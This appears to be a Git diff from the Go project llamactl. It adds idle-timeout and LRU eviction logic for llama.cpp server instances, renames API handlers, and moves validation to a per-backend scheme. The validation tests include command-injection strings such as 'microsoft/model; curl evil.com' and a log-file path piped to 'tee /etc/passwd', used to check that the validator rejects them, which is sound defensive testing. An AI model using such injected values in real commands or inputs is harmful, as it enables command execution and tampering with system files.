t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}

64
pkg/manager/timeout.go Normal file
View File

@@ -0,0 +1,64 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range im.instances {
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
im.mu.RUnlock() // Release read lock before calling StopInstance
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := im.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name, _ := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances without idle timeout
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict Instance
_, err := im.StopInstance(lruInstance.Name)
return err
}

328
pkg/manager/timeout_test.go Normal file
View File

@@ -0,0 +1,328 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set all to stopped and then shutdown
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -28,7 +28,23 @@ func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
} }
} }
// HelpHandler godoc // VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags version
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/plain")
fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
}
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server // @Summary Get help for llama server
// @Description Returns the help text for the llama server command // @Description Returns the help text for the llama server command
// @Tags server // @Tags server
@@ -37,7 +53,7 @@ func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
// @Success 200 {string} string "Help text" // @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /server/help [get] // @Router /server/help [get]
func (h *Handler) HelpHandler() http.HandlerFunc { func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) { return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help") helpCmd := exec.Command("llama-server", "--help")
output, err := helpCmd.CombinedOutput() output, err := helpCmd.CombinedOutput()
@@ -50,7 +66,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
} }
} }
// VersionHandler godoc // LlamaServerVersionHandler godoc
// @Summary Get version of llama server // @Summary Get version of llama server
// @Description Returns the version of the llama server command // @Description Returns the version of the llama server command
// @Tags server // @Tags server
@@ -59,7 +75,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
// @Success 200 {string} string "Version information" // @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /server/version [get] // @Router /server/version [get]
func (h *Handler) VersionHandler() http.HandlerFunc { func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) { return func(w http.ResponseWriter, r *http.Request) {
versionCmd := exec.Command("llama-server", "--version") versionCmd := exec.Command("llama-server", "--version")
output, err := versionCmd.CombinedOutput() output, err := versionCmd.CombinedOutput()
@@ -72,7 +88,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
} }
} }
// ListDevicesHandler godoc // LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server // @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server // @Description Returns a list of available devices for the llama server
// @Tags server // @Tags server
@@ -81,7 +97,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
// @Success 200 {string} string "List of devices" // @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /server/devices [get] // @Router /server/devices [get]
func (h *Handler) ListDevicesHandler() http.HandlerFunc { func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) { return func(w http.ResponseWriter, r *http.Request) {
listCmd := exec.Command("llama-server", "--list-devices") listCmd := exec.Command("llama-server", "--list-devices")
output, err := listCmd.CombinedOutput() output, err := listCmd.CombinedOutput()
@@ -100,7 +116,7 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
// @Tags instances // @Tags instances
// @Security ApiKeyAuth // @Security ApiKeyAuth
// @Produces json // @Produces json
// @Success 200 {array} Instance "List of instances" // @Success 200 {array} instance.Process "List of instances"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances [get] // @Router /instances [get]
func (h *Handler) ListInstances() http.HandlerFunc { func (h *Handler) ListInstances() http.HandlerFunc {
@@ -127,8 +143,8 @@ func (h *Handler) ListInstances() http.HandlerFunc {
// @Accept json // @Accept json
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options" // @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} Instance "Created instance details" // @Success 201 {object} instance.Process "Created instance details"
// @Failure 400 {string} string "Invalid request body" // @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [post] // @Router /instances/{name} [post]
@@ -168,7 +184,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
// @Security ApiKeyAuth // @Security ApiKeyAuth
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Instance details" // @Success 200 {object} instance.Process "Instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [get] // @Router /instances/{name} [get]
@@ -202,8 +218,8 @@ func (h *Handler) GetInstance() http.HandlerFunc {
// @Accept json // @Accept json
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options" // @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} Instance "Updated instance details" // @Success 200 {object} instance.Process "Updated instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [put] // @Router /instances/{name} [put]
@@ -242,7 +258,7 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
// @Security ApiKeyAuth // @Security ApiKeyAuth
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Started instance details" // @Success 200 {object} instance.Process "Started instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/start [post] // @Router /instances/{name}/start [post]
@@ -256,6 +272,12 @@ func (h *Handler) StartInstance() http.HandlerFunc {
inst, err := h.InstanceManager.StartInstance(name) inst, err := h.InstanceManager.StartInstance(name)
if err != nil { if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
@@ -275,7 +297,7 @@ func (h *Handler) StartInstance() http.HandlerFunc {
// @Security ApiKeyAuth // @Security ApiKeyAuth
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Stopped instance details" // @Success 200 {object} instance.Process "Stopped instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/stop [post] // @Router /instances/{name}/stop [post]
@@ -308,7 +330,7 @@ func (h *Handler) StopInstance() http.HandlerFunc {
// @Security ApiKeyAuth // @Security ApiKeyAuth
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Restarted instance details" // @Success 200 {object} instance.Process "Restarted instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/restart [post] // @Router /instances/{name}/restart [post]
@@ -435,7 +457,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return return
} }
if !inst.Running { if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable) http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return return
} }
@@ -456,6 +478,9 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
proxyPath = "/" + proxyPath proxyPath = "/" + proxyPath
} }
// Update the last request time for the instance
inst.UpdateLastRequestTime()
// Modify the request to remove the proxy prefix // Modify the request to remove the proxy prefix
originalPath := r.URL.Path originalPath := r.URL.Path
r.URL.Path = proxyPath r.URL.Path = proxyPath
@@ -555,17 +580,48 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
return return
} }
if !inst.Running { if !inst.IsRunning() {
allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
if !allowOnDemand {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable) http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return return
} }
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
}
proxy, err := inst.GetProxy() proxy, err := inst.GetProxy()
if err != nil { if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return return
} }
// Update last request time for the instance
inst.UpdateLastRequestTime()
// Recreate the request body from the bytes we read // Recreate the request body from the bytes we read
r.Body = io.NopCloser(bytes.NewReader(bodyBytes)) r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
r.ContentLength = int64(len(bodyBytes)) r.ContentLength = int64(len(bodyBytes))

View File

@@ -8,7 +8,7 @@ import (
"github.com/go-chi/cors" "github.com/go-chi/cors"
httpSwagger "github.com/swaggo/http-swagger" httpSwagger "github.com/swaggo/http-swagger"
_ "llamactl/docs" _ "llamactl/apidocs"
"llamactl/webui" "llamactl/webui"
) )
@@ -42,10 +42,12 @@ func SetupRouter(handler *Handler) *chi.Mux {
r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement)) r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
} }
r.Get("/version", handler.VersionHandler()) // Get server version
r.Route("/server", func(r chi.Router) { r.Route("/server", func(r chi.Router) {
r.Get("/help", handler.HelpHandler()) r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.VersionHandler()) r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.ListDevicesHandler()) r.Get("/devices", handler.LlamaServerListDevicesHandler())
}) })
// Instance management endpoints // Instance management endpoints

View File

@@ -2,6 +2,7 @@ package validation
import ( import (
"fmt" "fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance" "llamactl/pkg/instance"
"reflect" "reflect"
"regexp" "regexp"
@@ -33,20 +34,35 @@ func validateStringForInjection(value string) error {
return nil return nil
} }
// ValidateInstanceOptions performs minimal security validation // ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error { func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil { if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil")) return ValidationError(fmt.Errorf("options cannot be nil"))
} }
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns // Use reflection to check all string fields for injection patterns
if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil { if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err return err
} }
// Basic network validation - only check for reasonable ranges // Basic network validation for port
if options.Port < 0 || options.Port > 65535 { if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range")) return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
} }
return nil return nil

View File

@@ -1,6 +1,7 @@
package validation_test package validation_test
import ( import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance" "llamactl/pkg/instance"
"llamactl/pkg/testutil" "llamactl/pkg/testutil"
@@ -83,7 +84,8 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: tt.port, Port: tt.port,
}, },
} }
@@ -136,7 +138,8 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field) // Test with Model field (string field)
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: tt.value, Model: tt.value,
}, },
} }
@@ -173,7 +176,8 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field) // Test with Lora field (array field)
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Lora: tt.array, Lora: tt.array,
}, },
} }
@@ -196,7 +200,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{ {
name: "injection in model field", name: "injection in model field",
options: &instance.CreateInstanceOptions{ options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf", Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com", HFRepo: "microsoft/model; curl evil.com",
}, },
@@ -206,7 +211,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{ {
name: "injection in log file", name: "injection in log file",
options: &instance.CreateInstanceOptions{ options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf", Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd", LogFile: "/tmp/log.txt | tee /etc/passwd",
}, },
